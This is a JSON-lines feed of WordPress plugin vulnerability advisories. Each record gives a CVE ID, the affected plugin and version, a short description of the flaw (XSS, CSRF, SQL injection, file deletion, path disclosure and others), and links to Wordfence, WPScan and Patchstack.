{"CVE_ID":"CVE-2024-7413","slug":"obfuscate-email","versionImpact":"3.8.1","description":"The Obfuscate Email plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.8.1. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228079da-3c69-423c-b69b-f1a670258772?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/228079da-3c69-423c-b69b-f1a670258772?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/obfuscate-email\\\/trunk\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/obfuscate-email\\\/trunk\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9588","slug":"wp-custom-taxonomy-meta","versionImpact":"1.0.0","description":"The Category and Taxonomy Meta Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the 'wpaft_option_page' function. This makes it possible for unauthenticated attackers to add and delete taxonomy meta, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2dc9c744-6ffb-4d7a-94ce-ba576d7b6d47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-custom-taxonomy-meta\\\/trunk\\\/includes\\\/options.php?rev=1196908#L103\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10887","slug":"nicejob","versionImpact":"3.6.5","description":"The NiceJob plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of the plugin's shortcodes (nicejob-lead, nicejob-review, nicejob-engage, nicejob-badge, nicejob-stories) in all versions up to, and including, 3.6.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dd6a90e-03da-43e5-b975-be8f5aa5fc60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dd6a90e-03da-43e5-b975-be8f5aa5fc60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L209\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L209\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L328\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L328\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L390\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nicejob\\\/tags\\\/3.6.5\\\/nicejob.php#L390\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1702","slug":"ultimate-member","versionImpact":"2.10.0","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'search' parameter in all versions up to, and including, 2.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1654\\\/commits\\\/74647d42cc8d63f5d4f687efcd0792c246c23039\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1654\\\/commits\\\/74647d42cc8d63f5d4f687efcd0792c246c23039\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1863\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-member\\\/trunk\\\/includes\\\/core\\\/class-member-directory.php#L1863\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249862\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249862\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34adbae5-d615-4f8d-a845-6741d897f06c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34adbae5-d615-4f8d-a845-6741d897f06c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13768","slug":"cits-support-svg-webp-media-upload","versionImpact":"4.2","description":"The CITS Support svg, webp Media and TTF,OTF File Upload, Use Custom Fonts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2. This is due to missing or incorrect nonce validation on the cits_assign_fonts_tab() function. This makes it possible for unauthenticated attackers to delete font assignments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cits-support-svg-webp-media-upload\\\/trunk\\\/includes\\\/cits-custom-fonts.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea1f1825-241c-4060-a1e1-a13f92421fef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea1f1825-241c-4060-a1e1-a13f92421fef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3520","slug":"avatar","versionImpact":"0.1.4","description":"The Avatar plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in a function in all versions up to, and including, 0.1.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avatar\\\/trunk\\\/avatar.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avatar\\\/trunk\\\/avatar.php#L417\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avatar\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avatar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01769760-5bfe-4352-bc5b-141f078c0b6d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01769760-5bfe-4352-bc5b-141f078c0b6d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0719","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_sort_order function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b26604b-2423-4130-b0ef-8f63a392c760\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9b26604b-2423-4130-b0ef-8f63a392c760\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0589","slug":"wp-image-carousel","versionImpact":"1.0.2","description":"The WP Image Carousel WordPress plugin through 1.0.2 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58649228-69a6-4028-8487-166b0a07fcf7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/58649228-69a6-4028-8487-166b0a07fcf7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2470","slug":"add-to-feedly","versionImpact":"1.2.11","description":"The Add to Feedly WordPress plugin through 1.2.11 does not sanitize and escape its settings, allowing high-privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de0adf26-8a0b-4b90-96d5-4bec6e770e04\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de0adf26-8a0b-4b90-96d5-4bec6e770e04\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0291","slug":"quiz-master-next","versionImpact":"8.0.8","description":"The Quiz And Survey Master for WordPress is vulnerable to authorization bypass due to a missing capability check on the function associated with the qsm_remove_file_fd_question AJAX action in versions up to, and including, 8.0.8. This makes it possible for unauthenticated attackers to delete arbitrary media files.","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/171011\\\/wpqsm808-xsrf.txt\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2834471\\\/quiz-master-next\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68110321-db1a-4634-98cd-0afd3ec933b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68110321-db1a-4634-98cd-0afd3ec933b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-master-next\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1893","slug":"login-configurator","versionImpact":"2.1","description":"The Login Configurator WordPress plugin through 2.1 does not properly escape a URL parameter before outputting it to the page, leading to a reflected cross-site scripting vulnerability targeting site administrators.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbe6cf09-971f-42e9-b744-9339454168c7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dbe6cf09-971f-42e9-b744-9339454168c7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1389","slug":"paid-member-subscriptions","versionImpact":"2.11.1","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pms_stripe_connect_handle_authorization_return function in all versions up to, and including, 2.11.1. This makes it possible for unauthenticated attackers to change the Stripe payment keys.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/admin\\\/functions-admin-connect.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/paid-member-subscriptions\\\/trunk\\\/includes\\\/gateways\\\/stripe\\\/admin\\\/functions-admin-connect.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0591","slug":"wpdatatables","versionImpact":"3.4.2.2","description":"The wpDataTables \u2013 WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'A' parameter in all versions up to, and including, 3.4.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/samples\\\/Basic\\\/45_Quadratic_equation_solver.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wpdatatables\\\/trunk\\\/lib\\\/phpoffice\\\/phpspreadsheet\\\/samples\\\/Basic\\\/45_Quadratic_equation_solver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4377","slug":"dop-shortcodes","versionImpact":"1.2","description":"The DOP Shortcodes WordPress plugin through 1.2 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/778cebec-bdbb-4538-9518-c5bd50f76961\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/778cebec-bdbb-4538-9518-c5bd50f76961\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7412","slug":"no-update-nag","versionImpact":"1.4.12","description":"The No Update Nag plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.4.12. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77faa23e-4475-43d9-b475-fe999cda7b62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77faa23e-4475-43d9-b475-fe999cda7b62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/no-update-nag\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/no-update-nag\\\/trunk\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10854","slug":"buy-one-click-woocommerce","versionImpact":"2.2.9","description":"The Buy one click WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buy_one_click_import_options AJAX action in all versions up to, and including, 2.2.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9b755-1e6e-44ac-989a-201237f6dc9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3d9b755-1e6e-44ac-989a-201237f6dc9f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/buy-one-click-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12475","slug":"wp-multi-store-locator","versionImpact":"2.4.1","description":"The WP Multi Store Locator plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207533\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207533\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-multi-store-locator\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-multi-store-locator\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/089406e7-4f6a-416b-9077-e17c44069300?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/089406e7-4f6a-416b-9077-e17c44069300?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12620","slug":"animategl","versionImpact":"1.4.23","description":"The AnimateGL Animations for WordPress \u2013 Elementor & Gutenberg Blocks Animations plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'agl_json' AJAX action in all versions up to, and including, 1.4.23. This makes it possible for unauthenticated attackers to update the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animategl\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/animategl\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/841a028d-ff36-4e3f-903b-e25951648075?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/841a028d-ff36-4e3f-903b-e25951648075?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1463","slug":"wpgsi","versionImpact":"3.8.2","description":"The Spreadsheet Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.8.2. This is due to improper nonce validation within the class-wpgsi-show.php script. This makes it possible for unauthenticated attackers to publish arbitrary posts, including private, granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-show.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpgsi\\\/trunk\\\/admin\\\/class-wpgsi-show.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/#file352\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3250077\\\/#file352\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgsi\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpgsi\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/034ba83f-4ee3-40f1-a41a-8b3d0055a1ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/034ba83f-4ee3-40f1-a41a-8b3d0055a1ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2613","slug":"customized-login","versionImpact":"2.0.5","description":"The Login Manager \u2013 Design Login Page, View Login Activity, Limit Login Attempts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Custom logo and background URLs in all versions up to, and including, 2.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customized-login\\\/trunk\\\/customized-login.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/customized-login\\\/trunk\\\/customized-login.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ea5e34-9303-43c8-8579-80ef02e1d9c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2ea5e34-9303-43c8-8579-80ef02e1d9c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-47670","slug":"miniorange-login-openid","versionImpact":"7.6.10","description":"Improper Control of Filename for Include\/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in miniOrange WordPress Social Login and Register allows PHP Local File Inclusion. This issue affects WordPress Social Login and Register: from n\/a through 7.6.10.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-7-6-9-local-file-inclusion-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/miniorange-login-openid\\\/vulnerability\\\/wordpress-wordpress-social-login-and-register-7-6-9-local-file-inclusion-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6488","slug":"ismobile","versionImpact":"1.1.1","description":"The isMobile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018device\u2019 parameter in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318334\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318334\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ismobile\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ismobile\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1886db3-e01d-4cb1-8134-8cddff6503ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1886db3-e01d-4cb1-8134-8cddff6503ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
